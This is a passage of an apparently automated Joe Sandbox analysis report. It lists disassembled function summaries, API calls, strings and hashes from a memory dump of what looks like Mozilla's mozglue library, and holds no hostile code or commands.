                                              • Instruction Fuzzy Hash: DDE16071B043548BC714CF688850A5BF7E9BFC5314F158A2DE899D7790EBB0ED098B92
                                              APIs
                                              • IsDebuggerPresent.KERNEL32 ref: 6C526009
                                              • ??0PrintfTarget@mozilla@@IAE@XZ.MOZGLUE ref: 6C526024
                                              • ?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z.MOZGLUE(QLl,?), ref: 6C526046
                                              • OutputDebugStringA.KERNEL32(?,QLl,?), ref: 6C526061
                                              • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C526069
                                              • _fileno.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6C526073
                                              • _dup.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6C526082
                                              • _fdopen.API-MS-WIN-CRT-MATH-L1-1-0(00000000,6C54148E), ref: 6C526091
                                              • __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,QLl,00000000,?), ref: 6C5260BA
                                              • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6C5260C4
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1882874992.000000006C4C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C4C0000, based on PE: true
                                              • Associated: 00000000.00000002.1882852617.000000006C4C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1882998350.000000006C53D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883061502.000000006C54E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883102407.000000006C552000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6c4c0000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID: PrintfTarget@mozilla@@$?vprint@DebugDebuggerOutputPresentString__acrt_iob_func__stdio_common_vfprintf_dup_fdopen_filenofclose
                                              • String ID: QLl
                                              • API String ID: 3835517998-1288385546
                                              • Opcode ID: 5c44372d0f05cb710d0d768b8a42defb7812e25229023c193838656381f3a27a
                                              • Instruction ID: 82661944816c7442ae0bd97af5e5266b8da717e2c3043b0bdf4b398544d7e2e3
                                              • Opcode Fuzzy Hash: 5c44372d0f05cb710d0d768b8a42defb7812e25229023c193838656381f3a27a
                                              • Instruction Fuzzy Hash: 62219471A00208ABDB10AF249C09A9E7BB8FF45318F01C428E85E97280DB75A559CFD5
                                              APIs
                                              • EnterCriticalSection.KERNEL32(-0000000C), ref: 6C4E5EDB
                                              • memset.VCRUNTIME140(ewRl,000000E5,?), ref: 6C4E5F27
                                              • LeaveCriticalSection.KERNEL32(?), ref: 6C4E5FB2
                                              • memset.VCRUNTIME140(ewRl,000000E5,?), ref: 6C4E61F0
                                              • VirtualFree.KERNEL32(-00000001,00100000,00004000), ref: 6C4E7652
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1882874992.000000006C4C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C4C0000, based on PE: true
                                              • Associated: 00000000.00000002.1882852617.000000006C4C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1882998350.000000006C53D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883061502.000000006C54E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883102407.000000006C552000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6c4c0000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID: CriticalSectionmemset$EnterFreeLeaveVirtual
                                              • String ID: MOZ_CRASH()$MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x01U)) != 0) (Double-free?)$MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x20U)) == 0) (Freeing in decommitted page.)$MOZ_RELEASE_ASSERT((run->mRegionsMask[elm] & (1U << bit)) == 0) (Double-free?)$MOZ_RELEASE_ASSERT(mNode)$ewRl
                                              • API String ID: 2613674957-783701778
                                              • Opcode ID: d332682f14462c85dd47a6d36fa82aabe35a87a230da0ca9995f99da8409d233
                                              • Instruction ID: 6fde8845aada75c57d249c46e63fb0183c83c570ab56d2ccf7fb324bb466fdda
                                              • Opcode Fuzzy Hash: d332682f14462c85dd47a6d36fa82aabe35a87a230da0ca9995f99da8409d233
                                              • Instruction Fuzzy Hash: 40337F716097018FD304CF29C590E15BBE2BF8932AF2AC7ADE5698B796D731E841CB41
                                              Strings
                                              • expected a ProfilerOverheadDuration entry after ProfilerOverheadTime, xrefs: 6C514CAF
                                              • ProfileBuffer parse error: %s, xrefs: 6C514DD9
                                              • schema, xrefs: 6C5148C1
                                              • expected a ProfilerOverheadDuration entry after ProfilerOverheadTime,ProfilerOverheadDuration*3, xrefs: 6C514DB8, 6C514DD8
                                              • expected a ProfilerOverheadDuration entry after ProfilerOverheadTime,ProfilerOverheadDuration*2, xrefs: 6C514D65
                                              • data, xrefs: 6C5149B4
                                              • -%llu, xrefs: 6C514825
                                              • Tl, xrefs: 6C514F88
                                              • expected a ProfilerOverheadDuration entry after ProfilerOverheadTime,ProfilerOverheadDuration, xrefs: 6C514D0A
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1882874992.000000006C4C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C4C0000, based on PE: true
                                              • Associated: 00000000.00000002.1882852617.000000006C4C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1882998350.000000006C53D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883061502.000000006C54E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883102407.000000006C552000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6c4c0000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID: free
                                              • String ID: Tl$-%llu$ProfileBuffer parse error: %s$data$expected a ProfilerOverheadDuration entry after ProfilerOverheadTime$expected a ProfilerOverheadDuration entry after ProfilerOverheadTime,ProfilerOverheadDuration$expected a ProfilerOverheadDuration entry after ProfilerOverheadTime,ProfilerOverheadDuration*2$expected a ProfilerOverheadDuration entry after ProfilerOverheadTime,ProfilerOverheadDuration*3$schema
                                              • API String ID: 1294909896-2721798545
                                              • Opcode ID: 88ea0b0f1872fd6353035a56c0b04e508523174ecd01e93b9acc2c0e378f232b
                                              • Instruction ID: 5c70a2f1465204f92eb0d71974d65a441ddf0dfaf0f4302f2394309ada5b0e6e
                                              • Opcode Fuzzy Hash: 88ea0b0f1872fd6353035a56c0b04e508523174ecd01e93b9acc2c0e378f232b
                                              • Instruction Fuzzy Hash: 9C720C71918B858BD322CF34C85179BF7F5AFDA344F108B1DE4896B611EB70A486DB42
                                              APIs
                                              • EnterCriticalSection.KERNEL32(6C54E784,?,?,?,?,?,?,?,00000000,74DF2FE0,00000001,?,6C4FD1C5), ref: 6C4ED4F2
                                              • LeaveCriticalSection.KERNEL32(6C54E784,?,?,?,?,?,?,?,00000000,74DF2FE0,00000001,?,6C4FD1C5), ref: 6C4ED50B
                                                • Part of subcall function 6C4CCFE0: EnterCriticalSection.KERNEL32(6C54E784), ref: 6C4CCFF6
                                                • Part of subcall function 6C4CCFE0: LeaveCriticalSection.KERNEL32(6C54E784), ref: 6C4CD026
                                              • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,00001388,?,?,?,?,?,?,?,00000000,74DF2FE0,00000001,?,6C4FD1C5), ref: 6C4ED52E
                                              • EnterCriticalSection.KERNEL32(6C54E7DC), ref: 6C4ED690
                                              • ?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6C4ED6A6
                                              • LeaveCriticalSection.KERNEL32(6C54E7DC), ref: 6C4ED712
                                              • LeaveCriticalSection.KERNEL32(6C54E784,?,?,?,?,?,?,?,00000000,74DF2FE0,00000001,?,6C4FD1C5), ref: 6C4ED751
                                              • ?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6C4ED7EA
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1882874992.000000006C4C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C4C0000, based on PE: true
                                              • Associated: 00000000.00000002.1882852617.000000006C4C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1882998350.000000006C53D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883061502.000000006C54E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883102407.000000006C552000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6c4c0000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID: CriticalSection$Leave$Enter$K@1@Maybe@_RandomUint64@mozilla@@$CountInitializeSpin
                                              • String ID: : (malloc) Error initializing arena$<jemalloc>
                                              • API String ID: 2690322072-3894294050
                                              • Opcode ID: 2a0263d7219feccf030ea60b069053cc8aef4129f4d9a9450ab9fb7e9ccc386e
                                              • Instruction ID: 298bd6d9e88431c028c45a491fa91bc49c181cca75b6fa78b51a80f1cf50ec4d
                                              • Opcode Fuzzy Hash: 2a0263d7219feccf030ea60b069053cc8aef4129f4d9a9450ab9fb7e9ccc386e
                                              • Instruction Fuzzy Hash: A991C371A047418FD714DF39C890F2AB7E1EBC931AF16892ED56A87B81D770E845CB82
                                              APIs
                                              • Sleep.KERNEL32(000007D0), ref: 6C524EFF
                                              • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C524F2E
                                              • moz_xmalloc.MOZGLUE ref: 6C524F52
                                              • memset.VCRUNTIME140(00000000,00000000), ref: 6C524F62
                                              • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C5252B2
                                              • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C5252E6
                                              • Sleep.KERNEL32(00000010), ref: 6C525481
                                              • free.MOZGLUE(?), ref: 6C525498
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1882874992.000000006C4C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C4C0000, based on PE: true
                                              • Associated: 00000000.00000002.1882852617.000000006C4C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1882998350.000000006C53D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883061502.000000006C54E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883102407.000000006C552000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6c4c0000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID: floor$Sleep$freememsetmoz_xmalloc
                                              • String ID: (
                                              • API String ID: 4104871533-3887548279
                                              • Opcode ID: f4a998608cb2d91bb9b6528057838ed853ad3b08cf42b5bd3b220e41cb2aeea8
                                              • Instruction ID: 676c4b2f91bddfc55390abc0a49fc0e3e82b548c6fedacd0bc60b2061ac34adc
                                              • Opcode Fuzzy Hash: f4a998608cb2d91bb9b6528057838ed853ad3b08cf42b5bd3b220e41cb2aeea8
                                              • Instruction Fuzzy Hash: 82F1D371A18B408FC716DF39C85062BB7F5AFD6384F46872EF84AA7651EB31D8418B81
                                              APIs
                                              • GetLastError.KERNEL32 ref: 6C527046
                                              • FormatMessageA.KERNEL32(00001300,00000000,00000000,00000400,?,00000000,00000000), ref: 6C527060
                                              • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C52707E
                                                • Part of subcall function 6C4D81B0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,00000000,?,ProfileBuffer parse error: %s,expected a ProfilerOverheadDuration entry after ProfilerOverheadTime), ref: 6C4D81DE
                                              • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C527096
                                              • fflush.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6C52709C
                                              • LocalFree.KERNEL32(?), ref: 6C5270AA
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1882874992.000000006C4C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C4C0000, based on PE: true
                                              • Associated: 00000000.00000002.1882852617.000000006C4C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1882998350.000000006C53D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883061502.000000006C54E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883102407.000000006C552000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6c4c0000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID: __acrt_iob_func$ErrorFormatFreeLastLocalMessage__stdio_common_vfprintffflush
                                              • String ID: ### ERROR: %s: %s$(null)
                                              • API String ID: 2989430195-1695379354
                                              • Opcode ID: 0a649afc2c59101ba85a11e584ff91c3e6b39980200dc8675e563ef503a86b5a
                                              • Instruction ID: 6276a834b02dff30c0405a2f6792b0b0399469d8483384a324c5cde69ca211f1
                                              • Opcode Fuzzy Hash: 0a649afc2c59101ba85a11e584ff91c3e6b39980200dc8675e563ef503a86b5a
                                              • Instruction Fuzzy Hash: 1601D1B1A001047FDB00BB64DC4ADAF7BBCEF49319F024435F509E7241D67169148BE5
                                              APIs
                                              • EnterCriticalSection.KERNEL32(?), ref: 6C4E9EB8
                                              • LeaveCriticalSection.KERNEL32(?), ref: 6C4E9F24
                                              • memset.VCRUNTIME140(00000000,00000000,?), ref: 6C4E9F34
                                              • LeaveCriticalSection.KERNEL32(?), ref: 6C4EA823
                                              • ?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6C4EA83C
                                              • ?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6C4EA849
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1882874992.000000006C4C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C4C0000, based on PE: true
                                              • Associated: 00000000.00000002.1882852617.000000006C4C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1882998350.000000006C53D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883061502.000000006C54E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883102407.000000006C552000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6c4c0000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID: CriticalSection$K@1@LeaveMaybe@_RandomUint64@mozilla@@$Entermemset
                                              • String ID: MOZ_RELEASE_ASSERT(mNode)
                                              • API String ID: 2950001534-1351931279
                                              • Opcode ID: 096485727e62661cedeca1b60081fcae65567c4136aa3e4f13e99224d15c2995
                                              • Instruction ID: 7c5c2392b17bc453faf984cf38f167b516909ee1ce38746389c04a1554286ca4
                                              • Opcode Fuzzy Hash: 096485727e62661cedeca1b60081fcae65567c4136aa3e4f13e99224d15c2995
                                              • Instruction Fuzzy Hash: 65724C72A156118FD314CF28C540E15FFF1BF89329B2AC6ADE8699B791D335E842CB81
                                              APIs
                                              • ?EcmaScriptConverter@DoubleToStringConverter@double_conversion@@SAABV12@XZ.MOZGLUE ref: 6C512C31
                                              • ?ToShortestIeeeNumber@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@W4DtoaMode@12@@Z.MOZGLUE ref: 6C512C61
                                                • Part of subcall function 6C4C4DE0: ?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6C4C4E5A
                                                • Part of subcall function 6C4C4DE0: ?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?,?), ref: 6C4C4E97
                                              • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C512C82
                                              • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C512E2D
                                                • Part of subcall function 6C4D81B0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,00000000,?,ProfileBuffer parse error: %s,expected a ProfilerOverheadDuration entry after ProfilerOverheadTime), ref: 6C4D81DE
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1882874992.000000006C4C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C4C0000, based on PE: true
                                              • Associated: 00000000.00000002.1882852617.000000006C4C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1882998350.000000006C53D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883061502.000000006C54E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883102407.000000006C552000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6c4c0000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID: String$Double$Converter@double_conversion@@$Dtoa$Ascii@Builder@2@Builder@2@@Converter@CreateDecimalEcmaIeeeMode@12@Mode@12@@Number@Representation@ScriptShortestV12@__acrt_iob_func__stdio_common_vfprintfstrlen
                                              • String ID: (root)$ProfileBuffer parse error: %s$expected a Time entry
                                              • API String ID: 801438305-4149320968
                                              • Opcode ID: 978b055e68c9dfd5cbc1dcb65a6b80f00473794c5fcd260ea656bafb2a2e8f0b
                                              • Instruction ID: 9a75180ca0f2b7575498777e6315de044fbe01a5d18894ba7a95e7f0182b9a9f
                                              • Opcode Fuzzy Hash: 978b055e68c9dfd5cbc1dcb65a6b80f00473794c5fcd260ea656bafb2a2e8f0b
                                              • Instruction Fuzzy Hash: D791807060C7418BE714DF24C898A5EB7E1AFCA358F10491DE5998BB51EB30D94ACB92
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1882874992.000000006C4C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C4C0000, based on PE: true
                                              • Associated: 00000000.00000002.1882852617.000000006C4C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1882998350.000000006C53D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883061502.000000006C54E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883102407.000000006C552000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6c4c0000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID: __aulldiv__aullrem
                                              • String ID: -Infinity$NaN
                                              • API String ID: 3839614884-2141177498
                                              • Opcode ID: 81d6ea0e534b05b0f27111cb793bbb111f55262c809607d30ce3ffa569e1ee70
                                              • Instruction ID: 006132ab86b2c6c79db42dd56d9019d4039fd5e47bf4067fadeb7642e6db9ff5
                                              • Opcode Fuzzy Hash: 81d6ea0e534b05b0f27111cb793bbb111f55262c809607d30ce3ffa569e1ee70
                                              • Instruction Fuzzy Hash: C3C18B31E003198BDB14CFA9CC90BAEB7F6EB88714F15452DD405ABB80DB79A949CBD1
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1882874992.000000006C4C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C4C0000, based on PE: true
                                              • Associated: 00000000.00000002.1882852617.000000006C4C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1882998350.000000006C53D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883061502.000000006C54E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883102407.000000006C552000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6c4c0000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: $-$0$0$1$8$9$@
                                              • API String ID: 0-3654031807
                                              • Opcode ID: befccc26c29f91ca3ff8c5e4e80739d3fefc00e432174860404bbcf381516958
                                              • Instruction ID: 030b04b0b1b3233162061fb316653013be2f3907bcc632abb196c558ed5eb6b5
                                              • Opcode Fuzzy Hash: befccc26c29f91ca3ff8c5e4e80739d3fefc00e432174860404bbcf381516958
                                              • Instruction Fuzzy Hash: 5C62CC3878C3458FD705CE18C490F6ABBE2AF86359F184A1DE4E54BB61D3359886CB93
                                              APIs
                                              • memset.VCRUNTIME140(?,000000FF,?), ref: 6C538A4B
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1882874992.000000006C4C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C4C0000, based on PE: true
                                              • Associated: 00000000.00000002.1882852617.000000006C4C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1882998350.000000006C53D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883061502.000000006C54E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883102407.000000006C552000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6c4c0000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID: memset
                                              • String ID: ~qLl
                                              • API String ID: 2221118986-3881772974
                                              • Opcode ID: 83bd3679e087d2f8c0a363543460151d132c5b050c0c1d93b1d77d16f48f2b37
                                              • Instruction ID: 2ccc80626c62e681a41f17e0df89da17d642efbd55f12bd28956cea2213e7086
                                              • Opcode Fuzzy Hash: 83bd3679e087d2f8c0a363543460151d132c5b050c0c1d93b1d77d16f48f2b37
                                              • Instruction Fuzzy Hash: 46B1D772A0022ACFDB14CF68CC90799B7B2EF85314F1912AAD54DDB781E730A985CB91
                                              APIs
                                              • memset.VCRUNTIME140(?,000000FF,?), ref: 6C5388F0
                                              • memset.VCRUNTIME140(?,000000FF,?,?), ref: 6C53925C
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1882874992.000000006C4C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C4C0000, based on PE: true
                                              • Associated: 00000000.00000002.1882852617.000000006C4C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1882998350.000000006C53D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883061502.000000006C54E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883102407.000000006C552000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6c4c0000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID: memset
                                              • String ID: ~qLl
                                              • API String ID: 2221118986-3881772974
                                              • Opcode ID: 79f258be636af245f773d231f88ec99e234031016a7ca9cdfbf0dc900f23d892
                                              • Instruction ID: a67132475b3dd62250b50a9a45f86329a1a9b26dea2a1601a826ac4df58e7a2d
                                              • Opcode Fuzzy Hash: 79f258be636af245f773d231f88ec99e234031016a7ca9cdfbf0dc900f23d892
                                              • Instruction Fuzzy Hash: ECB1C672E0421ACFCB14CF58CC816EDB7B2EF85314F15126AD949EB785E730A999CB90
                                              APIs
                                              • LoadLibraryW.KERNEL32(ntdll.dll,?,6C52C0E9), ref: 6C52C418
                                              • GetProcAddress.KERNEL32(00000000,NtQueryVirtualMemory), ref: 6C52C437
                                              • FreeLibrary.KERNEL32(?,6C52C0E9), ref: 6C52C44C
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1882874992.000000006C4C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C4C0000, based on PE: true
                                              • Associated: 00000000.00000002.1882852617.000000006C4C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1882998350.000000006C53D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883061502.000000006C54E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883102407.000000006C552000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6c4c0000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID: Library$AddressFreeLoadProc
                                              • String ID: NtQueryVirtualMemory$ntdll.dll
                                              • API String ID: 145871493-2623246514
                                              • Opcode ID: fed1aa8a8769483a15a0c4ae60c32be753e81829f3294a4b95c28801be7d4727
                                              • Instruction ID: 5c1bc83f8a93b8c546aa81cabf0980c298603e7adf6ea7f0a4e57f852aef16bb
                                              • Opcode Fuzzy Hash: fed1aa8a8769483a15a0c4ae60c32be753e81829f3294a4b95c28801be7d4727
                                              • Instruction Fuzzy Hash: 26E0B6706057019BEF007FBACD08B167BF8A74634DF02D316AA04AA641EBB4D0208B58
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1882874992.000000006C4C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C4C0000, based on PE: true
                                              • Associated: 00000000.00000002.1882852617.000000006C4C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1882998350.000000006C53D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883061502.000000006C54E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883102407.000000006C552000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6c4c0000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: ' $0$0$1$9$@
                                              • API String ID: 0-2946122015
                                              • Opcode ID: 1643d36117a0a8e75c2868772ff2bfa8d4f1015071760cea4f0ad22cc8533e3a
                                              • Instruction ID: a69f1152c1c18f30ca2b54c099a46a52fffa8d811a79b5de0cb321ae3593c6eb
                                              • Opcode Fuzzy Hash: 1643d36117a0a8e75c2868772ff2bfa8d4f1015071760cea4f0ad22cc8533e3a
                                              • Instruction Fuzzy Hash: E382D2315093119BD711EF19C070E6EB7F2EF8175AF568A2AE8D547B90D334B886CB82
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1882874992.000000006C4C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C4C0000, based on PE: true
                                              • Associated: 00000000.00000002.1882852617.000000006C4C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1882998350.000000006C53D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883061502.000000006C54E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883102407.000000006C552000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6c4c0000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID: __aulldiv$__aullrem
                                              • String ID:
                                              • API String ID: 2022606265-0
                                              • Opcode ID: f56df46d33552dd8100cae53d24ae323fb4832d86786e5cbb4b774b0e277ade9
                                              • Instruction ID: 5bde39a5259a2118bf5c5f5c3883505545d4ba8c39fe993812ba69fa7112b8e7
                                              • Opcode Fuzzy Hash: f56df46d33552dd8100cae53d24ae323fb4832d86786e5cbb4b774b0e277ade9
                                              • Instruction Fuzzy Hash: 54320336B046118FC718DE6CC890E66BBE6AFC9310F09866DE895CB3A5D730ED05CB91
                                              APIs
                                              • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C517A81
                                              • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C517A93
                                                • Part of subcall function 6C4E5C50: GetTickCount64.KERNEL32 ref: 6C4E5D40
                                                • Part of subcall function 6C4E5C50: EnterCriticalSection.KERNEL32(6C54F688), ref: 6C4E5D67
                                              • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?), ref: 6C517AA1
                                                • Part of subcall function 6C4E5C50: __aulldiv.LIBCMT ref: 6C4E5DB4
                                                • Part of subcall function 6C4E5C50: LeaveCriticalSection.KERNEL32(6C54F688), ref: 6C4E5DED
                                              • ?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(FFFFFFFE,?,?,?), ref: 6C517B31
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1882874992.000000006C4C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C4C0000, based on PE: true
                                              • Associated: 00000000.00000002.1882852617.000000006C4C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1882998350.000000006C53D000.00000002.00000001.01000000.00000008.sdmpDownload File
